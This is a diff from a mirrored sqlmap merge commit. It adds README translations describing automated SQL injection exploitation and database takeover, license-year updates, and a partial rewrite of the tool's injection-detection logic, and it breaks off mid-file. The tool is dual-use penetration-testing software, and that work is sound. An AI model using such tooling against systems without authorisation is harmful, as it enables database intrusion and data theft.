mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-07-30 18:10:12 +03:00
Merge pull request #1 from sqlmapproject/master
This commit is contained in:
commit
1423814773
1
.gitattributes
vendored
1
.gitattributes
vendored
|
@ -1,4 +1,5 @@
|
||||||
*.py text eol=lf
|
*.py text eol=lf
|
||||||
|
*.conf text eol=lf
|
||||||
|
|
||||||
*_ binary
|
*_ binary
|
||||||
*.dll binary
|
*.dll binary
|
||||||
|
|
|
@ -55,5 +55,8 @@ Links
|
||||||
Translations
|
Translations
|
||||||
----
|
----
|
||||||
|
|
||||||
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
|
||||||
|
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
|
||||||
|
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
|
||||||
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
||||||
|
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||||
|
|
|
@ -1,12 +1,12 @@
|
||||||
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
||||||
of the GNU General Public License (GPL) is appended to this file.
|
of the GNU General Public License (GPL) is appended to this file.
|
||||||
|
|
||||||
sqlmap is (C) 2006-2013 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
sqlmap is (C) 2006-2015 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
||||||
|
|
||||||
This program is free software; you may redistribute and/or modify it under
|
This program is free software; you may redistribute and/or modify it under
|
||||||
the terms of the GNU General Public License as published by the Free
|
the terms of the GNU General Public License as published by the Free
|
||||||
Software Foundation; Version 2 with the clarifications and exceptions
|
Software Foundation; Version 2 (or later) with the clarifications and
|
||||||
described below. This guarantees your right to use, modify, and
|
exceptions described below. This guarantees your right to use, modify, and
|
||||||
redistribute this software under certain conditions. If you wish to embed
|
redistribute this software under certain conditions. If you wish to embed
|
||||||
sqlmap technology into proprietary software, we sell alternative licenses
|
sqlmap technology into proprietary software, we sell alternative licenses
|
||||||
(contact sales@sqlmap.org).
|
(contact sales@sqlmap.org).
|
||||||
|
|
507
doc/THANKS.md
507
doc/THANKS.md
File diff suppressed because it is too large
Load Diff
|
@ -20,6 +20,8 @@ This file lists bundled packages and their associated licensing terms.
|
||||||
* The Oset library located under thirdparty/oset/.
|
* The Oset library located under thirdparty/oset/.
|
||||||
Copyright (C) 2010, BlueDynamics Alliance, Austria.
|
Copyright (C) 2010, BlueDynamics Alliance, Austria.
|
||||||
Copyright (C) 2009, Raymond Hettinger, and others.
|
Copyright (C) 2009, Raymond Hettinger, and others.
|
||||||
|
* The PrettyPrint library located under thirdparty/prettyprint/.
|
||||||
|
Copyright (C) 2010, Chris Hall.
|
||||||
* The SocksiPy library located under thirdparty/socks/.
|
* The SocksiPy library located under thirdparty/socks/.
|
||||||
Copyright (C) 2006, Dan-Haim.
|
Copyright (C) 2006, Dan-Haim.
|
||||||
|
|
||||||
|
@ -55,7 +57,7 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||||
Copyright (C) 2008-2009, Jose Fonseca.
|
Copyright (C) 2008-2009, Jose Fonseca.
|
||||||
* The KeepAlive library located under thirdparty/keepalive/.
|
* The KeepAlive library located under thirdparty/keepalive/.
|
||||||
Copyright (C) 2002-2003, Michael D. Stenner.
|
Copyright (C) 2002-2003, Michael D. Stenner.
|
||||||
* The MultipartPost library located under thirdparty/multipartpost/.
|
* The MultipartPost library located under thirdparty/multipart/.
|
||||||
Copyright (C) 2006, Will Holcomb.
|
Copyright (C) 2006, Will Holcomb.
|
||||||
* The XDot library located under thirdparty/xdot/.
|
* The XDot library located under thirdparty/xdot/.
|
||||||
Copyright (C) 2008, Jose Fonseca.
|
Copyright (C) 2008, Jose Fonseca.
|
||||||
|
@ -281,8 +283,6 @@ be bound by the terms and conditions of this License Agreement.
|
||||||
Copyright (C) 2012, Marcel Hellkamp.
|
Copyright (C) 2012, Marcel Hellkamp.
|
||||||
* The PageRank library located under thirdparty/pagerank/.
|
* The PageRank library located under thirdparty/pagerank/.
|
||||||
Copyright (C) 2010, Corey Goldberg.
|
Copyright (C) 2010, Corey Goldberg.
|
||||||
* The PrettyPrint library located under thirdparty/prettyprint/.
|
|
||||||
Copyright (C) 2010, Chris Hall.
|
|
||||||
* The Termcolor library located under thirdparty/termcolor/.
|
* The Termcolor library located under thirdparty/termcolor/.
|
||||||
Copyright (C) 2008-2011, Volvox Development Team.
|
Copyright (C) 2008-2011, Volvox Development Team.
|
||||||
|
|
||||||
|
|
53
doc/translations/README-gr-GR.md
Normal file
53
doc/translations/README-gr-GR.md
Normal file
|
@ -0,0 +1,53 @@
|
||||||
|
sqlmap
|
||||||
|
==
|
||||||
|
|
||||||
|
|
||||||
|
Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
|
||||||
|
|
||||||
|
Εικόνες
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Μπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά.
|
||||||
|
|
||||||
|
Εγκατάσταση
|
||||||
|
----
|
||||||
|
|
||||||
|
Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο:
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.
|
||||||
|
|
||||||
|
Χρήση
|
||||||
|
----
|
||||||
|
|
||||||
|
Για να δείτε μια βασική λίστα από επιλογές πατήστε:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Για να πάρετε μια λίστα από όλες τις επιλογές πατήστε:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://gist.github.com/stamparm/5335217).
|
||||||
|
Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
|
Σύνδεσμοι
|
||||||
|
----
|
||||||
|
|
||||||
|
* Αρχική σελίδα: http://sqlmap.org
|
||||||
|
* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
53
doc/translations/README-hr-HR.md
Normal file
53
doc/translations/README-hr-HR.md
Normal file
|
@ -0,0 +1,53 @@
|
||||||
|
sqlmap
|
||||||
|
==
|
||||||
|
|
||||||
|
|
||||||
|
sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
|
||||||
|
|
||||||
|
Slike zaslona
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama.
|
||||||
|
|
||||||
|
Instalacija
|
||||||
|
----
|
||||||
|
|
||||||
|
Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.
|
||||||
|
|
||||||
|
Korištenje
|
||||||
|
----
|
||||||
|
|
||||||
|
Kako biste dobili listu osnovnih opcija i prekidača koristite:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Kako biste dobili listu svih opcija i prekidača koristite:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Možete pronaći primjer izvršavanja [ovdje](https://gist.github.com/stamparm/5335217).
|
||||||
|
Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
|
Poveznice
|
||||||
|
----
|
||||||
|
|
||||||
|
* Početna stranica: http://sqlmap.org
|
||||||
|
* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
52
doc/translations/README-zh-CN.md
Normal file
52
doc/translations/README-zh-CN.md
Normal file
|
@ -0,0 +1,52 @@
|
||||||
|
sqlmap
|
||||||
|
==
|
||||||
|
|
||||||
|
|
||||||
|
sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
|
||||||
|
|
||||||
|
演示截图
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示
|
||||||
|
|
||||||
|
安装方法
|
||||||
|
----
|
||||||
|
|
||||||
|
你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.
|
||||||
|
|
||||||
|
推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 **2.7.x** 版本的任何平台上
|
||||||
|
|
||||||
|
使用方法
|
||||||
|
----
|
||||||
|
|
||||||
|
通过如下命令可以查看基本的用法及命令行参数:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
通过如下的命令可以查看所有的用法及命令行参数:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
你可以从 [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
|
||||||
|
|
||||||
|
链接
|
||||||
|
----
|
||||||
|
|
||||||
|
* 项目主页: http://sqlmap.org
|
||||||
|
* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -3,7 +3,7 @@
|
||||||
"""
|
"""
|
||||||
beep.py - Make a beep sound
|
beep.py - Make a beep sound
|
||||||
|
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -45,6 +45,10 @@ def _win_wav_play(filename):
|
||||||
winsound.PlaySound(filename, winsound.SND_FILENAME)
|
winsound.PlaySound(filename, winsound.SND_FILENAME)
|
||||||
|
|
||||||
def _linux_wav_play(filename):
|
def _linux_wav_play(filename):
|
||||||
|
for _ in ("aplay", "paplay", "play"):
|
||||||
|
if not os.system("%s '%s' 2>/dev/null" % (_, filename)):
|
||||||
|
return
|
||||||
|
|
||||||
import ctypes
|
import ctypes
|
||||||
|
|
||||||
PA_STREAM_PLAYBACK = 1
|
PA_STREAM_PLAYBACK = 1
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -3,7 +3,7 @@
|
||||||
"""
|
"""
|
||||||
cloak.py - Simple file encryption/compression utility
|
cloak.py - Simple file encryption/compression utility
|
||||||
|
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -3,7 +3,7 @@
|
||||||
"""
|
"""
|
||||||
dbgtool.py - Portable executable to ASCII debug script converter
|
dbgtool.py - Portable executable to ASCII debug script converter
|
||||||
|
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -3,7 +3,7 @@
|
||||||
"""
|
"""
|
||||||
safe2bin.py - Simple safe(hex) to binary format converter
|
safe2bin.py - Simple safe(hex) to binary format converter
|
||||||
|
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
# See the file 'doc/COPYING' for copying permission
|
# See the file 'doc/COPYING' for copying permission
|
||||||
|
|
||||||
# Removes duplicate entries in wordlist like files
|
# Removes duplicate entries in wordlist like files
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
# See the file 'doc/COPYING' for copying permission
|
# See the file 'doc/COPYING' for copying permission
|
||||||
|
|
||||||
import codecs
|
import codecs
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -15,7 +15,6 @@ from subprocess import Popen as execute
|
||||||
|
|
||||||
from extra.beep.beep import beep
|
from extra.beep.beep import beep
|
||||||
from lib.core.agent import agent
|
from lib.core.agent import agent
|
||||||
from lib.core.common import arrayizeValue
|
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
from lib.core.common import extractTextTagContent
|
from lib.core.common import extractTextTagContent
|
||||||
|
@ -46,7 +45,6 @@ from lib.core.datatype import AttribDict
|
||||||
from lib.core.datatype import InjectionDict
|
from lib.core.datatype import InjectionDict
|
||||||
from lib.core.decorators import cachedmethod
|
from lib.core.decorators import cachedmethod
|
||||||
from lib.core.dicts import FROM_DUMMY_TABLE
|
from lib.core.dicts import FROM_DUMMY_TABLE
|
||||||
from lib.core.enums import CUSTOM_LOGGING
|
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
from lib.core.enums import HEURISTIC_TEST
|
from lib.core.enums import HEURISTIC_TEST
|
||||||
from lib.core.enums import HTTP_HEADER
|
from lib.core.enums import HTTP_HEADER
|
||||||
|
@ -54,18 +52,21 @@ from lib.core.enums import HTTPMETHOD
|
||||||
from lib.core.enums import NULLCONNECTION
|
from lib.core.enums import NULLCONNECTION
|
||||||
from lib.core.enums import PAYLOAD
|
from lib.core.enums import PAYLOAD
|
||||||
from lib.core.enums import PLACE
|
from lib.core.enums import PLACE
|
||||||
|
from lib.core.enums import REDIRECTION
|
||||||
from lib.core.exception import SqlmapConnectionException
|
from lib.core.exception import SqlmapConnectionException
|
||||||
from lib.core.exception import SqlmapNoneDataException
|
from lib.core.exception import SqlmapNoneDataException
|
||||||
from lib.core.exception import SqlmapSilentQuitException
|
from lib.core.exception import SqlmapSilentQuitException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
|
from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX
|
||||||
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
|
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
|
||||||
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
|
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
|
||||||
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
|
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
|
||||||
from lib.core.settings import UNKNOWN_DBMS
|
from lib.core.settings import SUPPORTED_DBMS
|
||||||
from lib.core.settings import URI_HTTP_HEADER
|
from lib.core.settings import URI_HTTP_HEADER
|
||||||
from lib.core.settings import LOWER_RATIO_BOUND
|
|
||||||
from lib.core.settings import UPPER_RATIO_BOUND
|
from lib.core.settings import UPPER_RATIO_BOUND
|
||||||
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
|
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
|
||||||
|
from lib.core.settings import IDS_WAF_CHECK_RATIO
|
||||||
from lib.core.threads import getCurrentThreadData
|
from lib.core.threads import getCurrentThreadData
|
||||||
from lib.request.connect import Connect as Request
|
from lib.request.connect import Connect as Request
|
||||||
from lib.request.inject import checkBooleanExpression
|
from lib.request.inject import checkBooleanExpression
|
||||||
|
@ -84,31 +85,53 @@ def checkSqlInjection(place, parameter, value):
|
||||||
# Set the flag for SQL injection test mode
|
# Set the flag for SQL injection test mode
|
||||||
kb.testMode = True
|
kb.testMode = True
|
||||||
|
|
||||||
for test in getSortedInjectionTests():
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
|
tests = getSortedInjectionTests()
|
||||||
|
seenPayload = set()
|
||||||
|
|
||||||
|
while tests:
|
||||||
|
test = tests.pop(0)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
if kb.endDetection:
|
if kb.endDetection:
|
||||||
break
|
break
|
||||||
|
|
||||||
if conf.dbms is None:
|
if conf.dbms is None:
|
||||||
|
# If the DBMS has not yet been fingerprinted (via simple heuristic check
|
||||||
|
# or via DBMS-specific payload) and boolean-based blind has been identified
|
||||||
|
# then attempt to identify with a simple DBMS specific boolean-based
|
||||||
|
# test what the DBMS may be
|
||||||
if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
|
if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
|
||||||
if not Backend.getIdentifiedDbms() and not kb.heuristicDbms:
|
if not Backend.getIdentifiedDbms() and kb.heuristicDbms is False:
|
||||||
kb.heuristicDbms = heuristicCheckDbms(injection) or UNKNOWN_DBMS
|
kb.heuristicDbms = heuristicCheckDbms(injection)
|
||||||
|
|
||||||
if not conf.testFilter and (Backend.getErrorParsedDBMSes() or kb.heuristicDbms) not in ([], None, UNKNOWN_DBMS):
|
# If the DBMS has already been fingerprinted (via DBMS-specific
|
||||||
if kb.reduceTests is None and Backend.getErrorParsedDBMSes():
|
# error message, simple heuristic check or via DBMS-specific
|
||||||
